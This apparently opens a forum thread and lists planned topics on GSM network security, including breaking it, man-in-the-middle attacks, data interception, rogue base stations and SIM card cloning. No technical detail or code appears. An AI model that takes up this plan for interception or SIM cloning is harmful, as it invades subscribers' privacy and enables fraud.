1. HOW IN/SECURE GSM NETWORKS REALLY ARE
2. HOW TO BREAK THIS SECURITY
3. HOW TO DO MAN IN THE MIDDLE ATTACKS ON THIS NETWORKS
4. HOW TO INTERCEPT DATA ON THIS NETWORKS
5. HOW TO SETUP BASE TRANSMISSION STATIONS
6. HOW TO ACCESS SIM APPLICATIONS\
7. HOW TO CLONE/HACK SIM CARDS
8. HOW TO CREATE OUR OWN GSM NETWORKS COMPLETE WITH :

• Personalised simcards
• sim applications
• secure network rules and protocols
• effective services 
• really cheap call rates (i know i will probably be killed for this so if you dont hear from me... ahem)

So with that... why dont we dive in..... start from the next post about the debugging devices.